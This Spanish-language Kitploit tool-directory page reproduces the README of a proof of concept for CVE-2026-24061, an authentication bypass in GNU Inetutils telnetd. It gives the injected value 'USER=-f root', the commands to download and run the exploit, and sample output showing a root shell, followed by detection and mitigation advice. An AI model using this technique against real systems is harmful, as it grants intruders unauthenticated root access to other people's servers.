Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24061-Telnetd — CVE-2026-24061 Omisión de autenticación en Telnetd de GNU Inetutils | Kitploit
Herramientas/GitHubGitHub/ish3ng0m4/cve-2026-24061-telnetd
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAutenticaciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubish3ng0m4/cve-2026-24061-telnetd

CVE-2026-24061-Telnetd

CVE-2026-24061 Omisión de autenticación en Telnetd de GNU Inetutils

Ver Repositorio
hace 6h 5mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-24061
Bypass de Autenticación en Telnetd de GNU Inetutils

CVE: CVE-2026-24061
Severidad: Crítica
CVSS: 9.8 (Crítica)
CWE: CWE-88 — Neutralización Incorrecta de Delimitadores de Argumentos en un Comando
Componente Afectado: telnetd de GNU Inetutils
Versiones Afectadas: 1.9.3 hasta 2.7

Resumen

CVE-2026-24061 es una vulnerabilidad crítica de bypass de autenticación en la implementación del servidor Telnet proporcionada por GNU Inetutils. La vulnerabilidad se origina por una validación insuficiente de la variable de entorno USER controlada por el cliente cuando el inicio de sesión automático de Telnet está habilitado. Un valor malicioso puede interpretarse como una opción para el programa de inicio de sesión del sistema en lugar de como un nombre de usuario. Bajo configuraciones vulnerables, un atacante remoto no autenticado puede abusar de este comportamiento para invocar login con la opción -f y eludir la autenticación, obteniendo potencialmente un shell con los privilegios de la cuenta solicitada.

Cuando el servicio Telnet afectado se ejecuta con privilegios de root, la explotación exitosa puede resultar en acceso remoto root no autenticado.

Descripción Técnica

El flujo de ejecución vulnerable se puede resumir como:

root@kitploit:~
 Cliente Telnet
      │
      │ USER=-f root
      ▼
    telnetd
      │
      │ construye argumentos de login
      ▼
 login -f root
      │
      │ bypass de autenticación
      ▼
 shell root

El problema se desencadena mediante la interacción entre la funcionalidad de inicio de sesión automático de Telnet y el manejo de la variable de entorno USER.

El valor controlado por el atacante:

root@kitploit:~
 -f root

no se trata estrictamente como un nombre de usuario. En su lugar, puede convertirse en un argumento para login, resultando en un comportamiento equivalente a:

root@kitploit:~
 login -f root

La opción -f indica a login que omita el proceso de autenticación normal para el usuario especificado.

Prueba de Concepto PoC

El repositorio incluye una prueba de concepto en Python 3 que realiza la conexión Telnet, maneja la negociación de protocolo requerida, inyecta el valor USER malicioso y verifica la sesión resultante.

Clonar el repositorio (Recomendado)

root@kitploit:~
 git clone https://github.com/Ish3ng0m4/CVE-2026-24061-Telnetd.git
 cd CVE-2026-24061-Telnetd
 chmod +x poc.py
 python3 poc.py <TARGET> <PORT>

Descargar solo poc.py

root@kitploit:~
 wget https://raw.githubusercontent.com/Ish3ng0m4/CVE-2026-24061-Telnetd/main/poc.py

Uso

Haga ejecutable el PoC:

root@kitploit:~
 chmod +x poc.py

Ejecútelo proporcionando la dirección del objetivo y el puerto Telnet:

root@kitploit:~
 python3 poc.py <TARGET> <PORT>

Ejemplo:

root@kitploit:~
 python3 poc.py 127.0.0.1 23

Explotación Exitosa

Un objetivo vulnerable produce una salida similar a:

CVE-2026-24061 - Bypass de Auth en telnetd de GNU Inetutils

root@kitploit:~
 [*] Objetivo: 127.0.0.1:23
 [+] Conectado
 [*] USER=-f root inyectado
 
 [+] VULNERABLE

El PoC proporciona entonces una sesión interactiva.

La escalada de privilegios se puede confirmar con:

root@kitploit:~
 id

Resultado esperado:

root@kitploit:~
 uid=0(root) gid=0(root) groups=0(root)

Esto confirma que el mecanismo de autenticación de Telnet fue eludido y la sesión resultante tiene privilegios de root.

Flujo de Trabajo del PoC

El exploit realiza las siguientes operaciones:

Se conecta al servicio Telnet objetivo. Realiza la negociación de protocolo Telnet requerida. Habilita el comportamiento de inicio de sesión automático necesario para la explotación. Suministra el valor malicioso USER=-f root. Permite que la implementación vulnerable de telnetd pase el valor manipulado a login. Recibe la sesión resultante. Proporciona una terminal interactiva al operador.

El PoC no depende de credenciales para la ruta de autenticación vulnerable.

Configuraciones Afectadas

La explotación depende de la configuración del objetivo y de la interacción entre telnetd y la implementación de login del sistema.

Las condiciones principales son:

telnetd de GNU Inetutils dentro del rango de versiones afectadas.
Servicio Telnet accesible para el atacante.
Funcionalidad de inicio de sesión automático habilitada o disponible.
Manejo vulnerable de la variable de entorno USER.
Una implementación de login compatible capaz de interpretar la opción inyectada.

En consecuencia, la presencia de una versión afectada de Inetutils por sí sola no debe tratarse como prueba de explotabilidad. Los parches de distribución y la configuración del servicio también deben considerarse.

Impacto

CVE-2026-24061 puede comprometer completamente un sistema vulnerable.

Dependiendo de los privilegios bajo los cuales opera telnetd, la explotación puede proporcionar:

Bypass de autenticación
Acceso no autorizado a cuentas locales
Ejecución remota de comandos
Escalada de privilegios
Acceso a nivel de root
Compromiso total del sistema

El escenario de mayor riesgo es un servicio Telnet accesible remotamente donde la explotación resulta en una sesión root.

Detección

Los indicadores potenciales de explotación incluyen:

Conexiones inesperadas a TCP/23.
Intentos de autenticación Telnet usando nombres de usuario inusuales.
Valores USER sospechosos que comienzan con opciones de línea de comandos.
Argumentos inesperados del proceso login.
Sesiones root originadas desde telnetd.
Procesos inesperados generados por el servicio Telnet.

El monitoreo de red también debe identificar sistemas que exponen servicios Telnet innecesariamente.

Mitigación

La respuesta recomendada es eliminar Telnet y usar SSH para la administración remota.

Si Telnet no puede eliminarse de inmediato:

Actualice a una versión proporcionada por el proveedor que contenga la corrección de seguridad.
Aplique la actualización de seguridad apropiada del sistema operativo.
Restrinja TCP/23 a redes de gestión confiables.
Evite la exposición directa de Telnet a redes no confiables.
Monitoree la autenticación Telnet y la actividad de procesos.

Debido a que las distribuciones de Linux pueden aplicar parches de seguridad sin cambiar el número de versión ascendente, los administradores deben verificar el estado de seguridad de su paquete de distribución en lugar de confiar únicamente en la versión mostrada.

Validación

La vulnerabilidad se reprodujo exitosamente contra un servicio Telnet vulnerable de GNU Inetutils ejecutándose en Ubuntu 22.04.5 LTS.

El PoC estableció una conexión a TCP/23, inyectó:

root@kitploit:~
 USER=-f root

y obtuvo una sesión root.

La verificación de privilegios devolvió:

root@kitploit:~
 uid=0(root) gid=0(root) groups=0(root)

Esto proporciona confirmación directa del impacto de seguridad.

Aviso Legal

Esta prueba de concepto se proporciona con fines de investigación de seguridad, validación de vulnerabilidades, pruebas de penetración autorizadas y fines educativos.

Solo pruebe sistemas para los cuales tenga autorización explícita.

Gabriel D. Ishengoma
Seguridad Ofensiva · Investigación en Ciberseguridad · Informática Forense Digital

Descargar herramienta